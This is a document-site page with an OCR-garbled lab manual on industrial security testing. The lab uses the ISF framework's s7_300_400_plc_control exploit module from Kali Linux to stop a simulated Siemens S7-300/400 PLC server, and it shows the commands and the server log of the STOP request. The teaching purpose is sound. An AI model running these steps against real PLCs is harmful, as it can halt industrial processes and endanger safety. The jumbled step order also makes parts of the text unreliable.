欢迎来到淘文阁 - 分享文档赚钱的网站! | 帮助中心 好文档才是您的得力助手!
淘文阁 - 分享文档赚钱的网站

热门搜索:

上传我的资源
淘文阁 - 分享文档赚钱的网站
上传我的资源
全部分类
  • 研究报告>
  • 管理文献>
  • 标准材料>
  • 技术资料>
  • 教育专区>
  • 应用文书>
  • 生活休闲>
  • 考试试题>
  • pptx模板>
  • 工商注册>
  • 期刊短文>
  • 图片设计>
  • 首页
  • 专题
  • 客服中心
  • 免费区
  • 分享圈
    • ImageVerifierCode 换一换

    工业互联网安全测试技术:应用测试.docx

    • 资源ID:86641228       资源大小:129.08KB        全文页数:12页
    • 资源格式: DOCX        下载积分:15金币
    快捷下载 游客一键下载
    会员登录下载
    微信登录下载
    三方登录下载: 微信开放平台登录   QQ登录  
    二维码
    微信扫一扫登录
    下载资源需要15金币
    邮箱/手机:
    温馨提示:
    快捷下载时,用户名和密码都是您填写的邮箱或者手机号,方便查询和重复下载(系统自动生成)。
    如填写123,账号就是123,密码也是123。
    支付方式: 支付宝    微信支付   
    验证码:   换一换

     
    账号:
    密码:
    验证码:   换一换
      忘记密码?
        
    友情提示
    1、下载资料失败解决办法   
    2、PDF文件下载后,可能会被浏览器默认打开,此种情况可以点击浏览器菜单,保存网页到桌面,就可以正常下载了。
    3、本站不支持迅雷下载,请使用电脑自带的IE浏览器,或者360浏览器、谷歌浏览器下载即可。
    4、本站资源下载后的文档和图纸-无水印,预览文档经过压缩,下载后原文更清晰。
    5、试题试卷类文档,如果标题没有明确说明有答案则都视为没有答案,请知晓。
    客服网站客服投诉侵权投诉

    工业互联网安全测试技术:应用测试.docx

    系统2应用测试实验文档实验原理通过ISF工控漏洞利用框架,利用s7_300_400_plc_control的漏洞,使S7-300/400PLC 启停脚本,ISFQndustrial Exploitation Framework), ISF 是一款基于 python 编写的类似 metasploit的工控漏洞利用框架,其中Exploit模块,包含了普遍性较高的工控协议的一些 漏洞利用模块。实验目的通过ISF工控漏洞利用框架,利用s7协议的漏洞,使S7-300/400PLC应用软件自动停 止。实验环境(1)攻击机:Kali Linux虚拟机(环境自带)(2)靶机:winlO (环境自带)推荐课时数:2课时实验步骤步骤一:开启并配置serverdemo应用程序(1)在winlO中开启serverdemo工业软件,如下列图1所示:文件共享 查看应用程序工具<-v t« Siemens S7协议 S7工控模拟器V101管理S7工控模拟器X/名称1 1 1.md修改日期2020/2/29 22:58MD文件大小1 KB业 clientdemo.exe2014/12/23 19:16应用程序2,193 KB卷 PartnerDemo.exe2014/12/23 19:24应用程序2,091 KB serverdemo.exe2014/12/23 19:241,872 KBT snap7.dll2014/12/18 19:25应用程序扩展207 KBP 搜索"S7工模拟器"5个工程 选中1个工程2.14 MB图 1 serverdemo命令:run得到结果如下列图13所示:isf () > + "target*: ,1isf ( 一 C F ii * ) > runisf ("一)>isf (7)(:)P llnir.)>isf (v)PJin)>isf ( 71 ' F ntrj ) >isf ( 7 : I) > run* Running module + Target is aliveSending packet to target Stop plc图13配置参数(4) 在kali linux中开始攻击后,可以在winlO主机上观察到serverdemo应用程序的服务已经关闭,如下列图14所示: Snap7 Server Demo - Windows platform 32 bit LazarusLocal AddressLog Mask db 1 DB 2 DB 310,133.148,102StopStop00000000000000evcServerStarted:$00000001evcServerStopped:$00000002vcList«n«rCannocStart:500000004vcCli«ntAdd«d:$00000008vcCli«ntR«j:$00000010vcClientNoRoom:$00000020vcCli«nt£xc«ption:$00000040vcClientDisconn«cted:$00000080evcCliencTerminaed:$00000100evcCliencsDropped:$00000200evcReserved_0400:500000400evcReserved_0800:$00000800evcReserved_1000:$00001000evcReserved 2000:500002000evcReserved_4000$00004000evcR«s«rv»d_8000:$00008000vcPDUincoming500010000vcDataR«ad:$00020000evcDataWrit«-$00040000vcN«goti*t«PDU$00080000evcReadSZL$00100000vcClock$00200000evcUpload$00400000evcDirectory$00800000evcSecurity-$01000000evcControl-$02000000evcReserved_04000000-$04000000evcReserved 08000000z$080000002021-12-09 2021-12-09 2021-12-09 2021-12-09 2021-12-09 2021-12-0919:55:04 19:57:39 19:57:39 19:57:39 19:57:39 19:57:39Server started 10.133.148.102 10,133.148.102 10.133.148.102 10.133.148.102 10.133.148.102Client addedThe client requires a PDU size of 480 bytes Read SZL request, ID:0x0011 INDEX:0x0000 > OKRead SZL request, ID:0x001c INDEX:0x0000 > OKRead SZL request, ID:0x0131 INDEX:0x0001 OK2021-12-0919:59:5310.133.148.102Client added2021-12-0919:59:5310.133.148.102Client disconnectedby peer2021-12-0919:59:53(10.133.148.102)Client added2021-12-0919:59:5310.133.148.102The client requiresa PDU sizeof 480 bytes2021-12-0919:59:5310.133.148.102CPU Control request:STOP >OK2021-12-0919:59:5310.133.148.102Client added2021-12-0919:59:5310.133.148.102Client disconnectedby peer2021-12-0921:14:2610.133.148.102Client disconnectedby peerRunning Clients : 1图14攻击成功 翻开serverdemo应用程序的界面,如下列图2所示:Snap7 Server Demo - Windows platform 32 bit LazarusLog Mask DB 1 DB 2 DB 300000000000000 <vcServerStarred: $00000001:$00000002vcListenerCannotStart : $00000004evcClientAddedevcClxentNoRoomevcClientException evcClientDisconnected evcClientTerminatedvcClientsDroppedevcReserved_0400vcR»««rved_0800evcReserved_1000evcReserved_2000:$00000008:$00000010:$00000020:$00000040:$00000080:$00000100:$00000200:$00000400:$00000800:500001000:$0000200000000000000000vcReserved_4000:$00004000vcReserved_8000:$00008000vcPDUincoming:$00010000vcDataead:$00020000vcDataWrit*:$00040000vcNegotiatePDU:$00080000vcReadSZL:$00100000vcClock:$00200000vcUpload:$00400000vcDirectory:$00800000vcSecurity:501000000vcControl:502000000vcReserved 04000000:$04000000vcReserved 08000000:$08000000Mask $FFFFFFFFStopped Chents: 0图 2 serverdemo 界面 查询winlO主机的IP地址,在命令行窗口中输入如下命令:ipconfig得到的结果如下列图3所示: C:WINDOWSsystem32cmd.exeMicrosoft Windows 版本 10. 0. 19042. 1348(c) Microsoft Corporation。保存所有权利。C:Userssyy>ipconfigWindows IP 配置以太网适配器以太网:媒体状态连接特定的DNS后缀媒体已断开连接无线局域网适配器 本地连接* 2:媒体状态连接特定的DNS后缀媒体己断开连接无线局域网适配器 本地连接* 3:媒体状态连接特定的DNS后缀媒体已断开连接以太网适配器 VMware Network Adapter Wnetl:连接特定的DNS后缀 本地链接IPv6地址. IPv4地址子网掩码默认网关fe80:el78:dddO:ea38:lc08%6192. 168. 157. 1255. 255. 255. 0以太网适配器 VMware Network Adapter VMnet8:连接特定的DNS后缀 本地链接IPv6地址. IPv4地址子网掩码默认网关无线局域网适配器WLAN:连接特定的DNS后缀 本地链接IPv6地址. IPv4地址子网掩码默认网关fe80:f078:9068:2fd7:26a4%2192. 168. 17. 1255. 255. 255. 0fe80:85da:804:lf3f:b6c4%ll10.133. 148. 102255. 255. 128. 010.133. 255. 254图3查询IP地址(4)翻开serverdemo应用程序后,进行serverdemo应用程序的配置,也就是将ip地址配置为winlO的ip地址,如下列图4所示:Snap7 Server Demo - Windows platform 32 bit LazarusLog Mask db 1 DB 2 DB 3evcServerS&rtedevcServerS&rted:$00000001evcServerStopped:$00000002evcClientAdded:500000008evcClientRejected:500000010evcClientNoRoom:$00000020evcClientException:500000040vcClientDisconn«ct«d:$00000080evcClientTerminated:$00000100evcClxentsDropped:$00000200evcReserved_0400:$00000400evcReserved_0800:$00000800evcReserved_1000:$00001000evcReserved 2000:500002000evcListenerCannotStart : $00000004vcReserved_4000:500004000vcReserved_8000:$00008000vcPDUincoming:$00010000vcDataRead:$00020000vcDataWrite:500040000vcNegotiatePDU:$00080000vcReadSZL:$00100000vcClock:$00200000vcUpload:$00400000vcDir«ctory:$00800000vcSecurity:$01000000vcControl:502000000evcReserved_04000000:504000000evcReserved_08000000:$08000000>Stopped Gents: 0图4配置IP地址 配置好ip地址后,那么点击start按钮,可以看到Server started结果,即服务已开启,如下列图5所示:Snap7 Server Demo - Windows platform 32 bit LazarusLog Mask DB 1 DB 2 DB 3Log Mask DB 1 DB 2 DB 310.133.148.102vcServerStarted:$00000001vcS*rv«rScopped:$00000002vcLiscenerCannocScarc:$00000004vcClxentAdded:$00000008vcClienRejeered:$00000010vcClxenNoRoom:$00000020vcClientException:$00000040vcCl±«ncDxsconn»ci«d:$00000080vcClientTerminated:$00000100vcClxencsDropped:$00000200vcReserved_0400:$00000400vcReserved_0800:$00000800vcReserved_1000:$00001000vcReserved 2000:$00002000vcReserved_4000$00004000vcR*serv*d_8000z$00008000vcPDUincoming$00010000vcDacaReadz500020000vcDaCaWrxe-$00040000vcNegocia-cePDU-$00080000vcReadSZL-$00100000vcClock$00200000vcUpload-$00400000vcDirectory-$00800000vcSecuricy501000000vcControl-502000000vcReserved_04000000X$04000000vcReserved_08000000z$080000002021-12-09 19:55:04 Server startedRunnrig Cbents : 0图5开启server步骤二:开启并配置clientdemo应用程序(1)在winlO中开启clientdemo工业软件,如下列图6所示:I Q V I S7工模拟器一 口 X文件<-个 siemens S7协议> S7工控模拟器 QP 搜索"S7工控模拟器"名称八修改日期大小1.md2020/2/29 22:58MD文件1 KB卷)clientdemo.exe2014/12/23 19:162,193 KB|如 PartnerDemo.exe2014/12/23 19:24函的2,091 KB如 serverdemo.exe2014/12/23 19:241,872 KB国 snap7.dll2014/12/18 19:25应用程序扩展207 KB5个工程画后图 6 clientdemo翻开clientdemo应用程序,并配置好IP地址,IP地址即为winlO主机的地址10,133.148,102,如下列图7所示:mJ Snap7 Client Demo - Windows platform 32 bit LazarusConnect asPG vAsync Mode® Polling OEvent O CaNback- XPDU S<ze (byte) 0What's the 'smart connect" feature ?Read SZLSystem Info Data rtad/>rit«Date/TireMulti rtad/vrittControlSecurityDirectory Block - Up Download Block - DB Cet/FillWhich parameters should use for the connection?CatalogOrder codeINFO NOT AVAILABLEUnit InfoModule T:t>6 Na=eINFONOTAVAILABLESerial nuaberINFONOTAVAILABLEVendor copyrightINFONOTAVAILABLEAS Na=eINFONOTAVAILABLEModule NaseINFONOTAVAILABLECossEunication Info/ PDU uze (bytt)INFONOTAVAILABLE3 active connectionsINFONOTAVAILABLE3 MFI rate .bps)INFONOTAVAILABLEMax com. bus rar« :bpiINFONOTAVAILABLEf 7SAF Tab xs used for the connection. The svstea Info is not called autosati This because sose PLC (S200/U)CO> don't offer图7配置IP地址(3)配置好ip地址后,点击Connect按钮,与serverdemo服务进行连接,如下列图8所示:(Snap? Client Demo - Windows platform 32 bit LazarusRack/Slot TSAPConnect as Rack SlotPG 7Rack/Slot TSAPConnect as Rack SlotPG 7Async Mode Polling OEvent O CalbackPDU Size (byte) 0What's the "smart connect" feature )Whkh parameters should I use for the connection?Read SZLDate TireControlSecurityData rtad ,writeMulti read "rriteDirtctory Block - Up/Do»nload Block - DB G«t/FillCatalocOrder codeINFO NOT AVAILABLEUnit InfoModule Tvp* Xb=«INFONOTAVAILABLESerial nunberINFONOTAVAILABLEVendor copyrightINFONOTAVAILABLEAS Na=eINFONOTAVAILABLEModule NaaeINFONOTAVAILABLECosecunication InfoMu PDU size (byt»)INFONOTAVAILABLEMax active connectionsINFONOTAVAILABLEMax MPI rate bps)INFONOTAVAILABLEMax con bus rare bps'INFONOTAVAILABLE图9连接服务(6)连接serverdemo服务成功后,可以在serverdemo应用程序中看到连接成功的结果,如下列图10所示:Snap7 Server Demo - Windows platform 32 bit LazarusStopStopvcServerStopped:500000002vcList«nerCarmotStart:$00000004vcCllentAdded:$00000008vcClientRejected:$00000010vcClientNoRoom:$00000020vcClientException:$00000040vcCli»ntDiscorm«ct«d:$00000080vcClientT«nmnated:$00000100vcCliencsDxopped:500000200vcReserved_0400:$00000400vcReserved_0800:$00000800vcResexved_1000:$00001000vcReserved 2000:$00002000:$00000001vcS«rv«rScartedMask ;FFFFFFFFvcR«s«rved_4000:$00004000vcReserved_8000:$00008000vcPDUincoming:500010000vcDataRead:$00020000vcDataWrite:$00040000vcNegotiatePDU:$00080000vcReadSZL:$00100000vcClock:$00200000vcUpload:$00400000vcDirectory:$00800000vcSecurity:$01000000vcControl:$02000000vcaeserved_04000000:$04000000vceserved 08000000:5080000002021-12-092021-12-092021-12-092021-12-092021-12-092021-12-0919:55:04 19:57:39 19:57:39 19:57:39 19:57:39 19:57:39Server started 10.133.148.102 10.133.148.102 10.133.148.102 10.133.148.102 10.133.148.102Client addedThe client requires a PDU size of 480 bytes Read S2L request, ID:0x0011 INDEX:0x0000 > OKRead SZL request, ID:0x001c INDEX:0x0000 > OK Read SZL request, ID:0x0131 INDEX:0x0001 > OKRunningOients: 110,133.148,102Local AddressLog MaskDB 1D62D63图10连接成功界面步骤三:使用ISF框架利用漏洞使serverdem。应用程序服务暂停(1) 在 github 中 s:/github /dark-lbp/isf 链接下,下载 ISF 框架,然后进入 isf-master目录下,然后输入如下命令:python2.7 isf.py得到结果如下列图11所示:,-| /桌面 /isf-masterpython2.7 isf,ovICS Exploitation FrameworkNote : ICSSPOLIT is fork from routersploit athub /reverse-shell/routersploitDev Team : wenzhe zhu(dark-lbp)Exploits: 8 Scanners: 6 Creds: 14ICS Exploits: PLC: 7ICS Switch: 0Software: 0图11开启isf使用ISF框架中的s7_300_400_plc_control,然后输入如下命令:use exploits/plcs/siemens/s7_300_400_plc_controlshow options得到结果如下列图12所示:isf > show optionsYou have to activate any module with * use * command. isf > use exploits/plcs/siemens/s7_300_400_plc_control isf ( ) > show optionsTarget options:Name Current settingsDescriptiontargetport102targetport102Target PortModule options:NameCurrent settingsDescriptionslot commandCPU slot number.Command l:start plc, 2:stop plc.图 12 show options(2) 设置需要攻击的对象,即攻击的IP地址,然后输入run命令,进行攻击,输入如下

    注意事项

    本文(工业互联网安全测试技术:应用测试.docx)为本站会员(太**)主动上传,淘文阁 - 分享文档赚钱的网站仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。 若此文所含内容侵犯了您的版权或隐私,请立即通知淘文阁 - 分享文档赚钱的网站(点击联系客服),我们立即给予删除!

    温馨提示:如果因为网速或其他原因下载失败请重新下载,重复下载不扣分。




    关于淘文阁 - 版权申诉 - 用户使用规则 - 积分规则 - 联系我们

    本站为文档C TO C交易模式,本站只提供存储空间、用户上传的文档直接被用户下载,本站只是中间服务平台,本站所有文档下载所得的收益归上传人(含作者)所有。本站仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。若文档所含内容侵犯了您的版权或隐私,请立即通知淘文阁网,我们立即给予删除!客服QQ:136780468 微信:18945177775 电话:18904686070

    工信部备案号:黑ICP备15003705号 © 2020-2023 www.taowenge.com 淘文阁 

    收起
    在线客服
    意见反馈
    返回顶部
    展开
    QQ交谈
    返回顶部